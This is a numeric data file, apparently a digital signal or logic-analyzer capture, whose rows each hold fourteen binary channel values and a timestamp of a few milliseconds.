0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3376960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3377240e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3377480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3377720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3377960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3378200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3378440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3378720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3378960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3379240e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3379480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3379720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3379960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3380200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3380440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3380720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3380960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3381240e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3381480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3381720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3381960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3382200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3382440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3382720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3382960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3383240e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3383480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3383720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3383960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3384200e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3384440e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3384720e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3384960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,6.3385240e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,6.3385480e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,6.4635640e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,1,6.4637680e-03 1,0,0,0,0,0,0,0,0,0,0,1,0,1,6.4637880e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,1,6.4638120e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,1,6.4641440e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,1,6.4641720e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,1,6.4642200e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,1,6.4642440e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,1,6.4642920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,1,6.4643200e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,1,6.4643720e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4643960e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4644440e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4644680e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4645200e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4645440e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4645720e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4645960e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4646440e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4646680e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4647200e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4647440e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4647960e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4648200e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4648680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4648920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4649440e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4649720e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4650200e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4650440e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4650680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4650920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4651160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4651400e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4651920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4652160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4652680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4652920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4653400e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4653640e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4654200e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4654440e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4654680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4654920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4655160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4655400e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4655920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4656160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4656680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4656920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4657440e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4657640e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4658200e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4658440e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4658920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4659160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4659680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4659920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4660160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4660440e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4660680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4660920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4661160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4661440e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4661640e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4661920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4662160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4662440e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4662680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4662920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4663160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4663440e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4663640e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4663920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4664440e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4664680e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4665160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4665400e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4665920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4666160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4666680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4666920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4667400e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4667640e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4667920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4668160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4668440e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4668680e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4668920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4669160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4669400e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4669640e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4669920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4670160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4670440e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4670680e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4671160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4671400e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4671640e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4671920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4672160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4672440e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4672680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4672920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4673160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4673400e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4673640e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4673920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4674160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4674440e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4674680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4674920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4675160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4675400e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4675640e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4675920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4676160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4676440e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4676680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4676920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4677160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4677400e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4677640e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4677920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4678160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4678440e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4678680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4678920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4679160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4679400e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4679920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4680160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4680440e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4680680e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4680920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4681160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4681400e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4681640e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4681920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4682160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4682440e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4682680e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4682920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4683160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4683400e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4683640e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4683920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4684160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4684680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4684920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4685400e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4685640e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4685920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4686160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4686440e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4686680e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4686920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4687160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4687400e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4687640e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4688200e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4688440e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4688920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4689160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4689680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4689920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4690440e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4690680e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4691160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4691400e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4691640e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4691920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4692160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4692440e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4692680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4692920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4693160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4693400e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4693640e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4693920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4694160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4694440e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4694680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4694920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4695160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4695400e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4695920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4696160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4696440e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4696680e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4696920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4697160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4697400e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4697640e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4697920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4698160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4698440e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4698680e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4698920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4699160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4699680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4699920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4700440e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4700680e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4701160e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4701400e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4701920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4702160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4702680e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4702920e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4703400e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4703640e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4703920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4704160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4704440e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4704680e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4704920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4705160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4705400e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4705640e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4705920e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4706160e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4706480e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4706760e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4707000e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4707240e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4707480e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4707720e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4708000e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4708240e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4708480e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4708760e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4709000e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4709240e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4709480e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4709720e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4709960e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4710240e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4710520e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4710760e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4711000e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4711240e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4711480e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4711720e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4712000e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4712240e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4712520e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4712760e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4713000e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4713240e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4713480e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4713720e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4714000e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4714240e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4714520e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4714760e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4715040e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4715320e-03 1,0,0,0,0,0,0,0,0,0,0,0,1,0,6.4715560e-03 1,0,0,0,0,0,0,0,0,0,0,0,0,0,6.4715800e-03 1,0,0,0,0,1,0,0,0,1,0,0,0,0,6.4715880e-03 1,0,0,0,0,1,0,0,0,1,0,0,0,1,6.5954680e-03 0,0,0,0,0,1,0,0,0,1,0,0,0,1,6.5956920e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,1,6.5957160e-03 0,1,0,0,0,1,0,0,0,1,0,1,0,1,6.5957320e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,1,6.5957560e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,1,6.5960520e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,1,6.5960760e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,1,6.5961000e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,1,6.5961240e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,1,6.5961480e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,1,6.5961720e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,1,6.5962000e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,1,6.5962240e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,1,6.5962520e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,1,6.5962760e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5963000e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5963240e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5963480e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5963560e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5963720e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5964000e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5964040e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5964520e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5964760e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5965000e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5965240e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5965480e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5965720e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5966000e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5966240e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5966520e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5966760e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5967000e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5967240e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5967320e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5967480e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5967720e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5968280e-03 0,1,0,0,0,0,0,0,0,1,0,0,0,0,6.5968520e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5968560e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5968760e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5969000e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5969240e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5969480e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5969720e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5970000e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5970240e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5970520e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5970560e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5971000e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5971240e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5971480e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5971720e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5971800e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5972000e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5972240e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5972520e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5972760e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5973000e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5973240e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5973480e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5973720e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5974000e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5974240e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5974760e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5975000e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5975080e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5975240e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5975480e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5975720e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5976000e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5976240e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5976520e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5976760e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5977000e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5977240e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5977480e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5977720e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5978000e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5978240e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5978520e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5978760e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5979000e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5979040e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5979240e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5979480e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5980000e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5980240e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5980520e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5980760e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5981000e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5981240e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5981480e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5981720e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5981800e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5982280e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5982520e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5982760e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5983000e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5983240e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5983480e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5983720e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5984000e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5984240e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5984520e-03 0,1,0,0,0,0,0,0,0,0,0,0,1,0,6.5985000e-03 0,1,0,0,0,0,0,0,0,0,0,0,0,0,6.5985240e-03 0,1,0,0,0,1,0,0,0,1,0,0,0,0,6.5985320e-03 0,1,0,0,0,1,0,0,0,1,0,0,1,0,6.5985720e-03 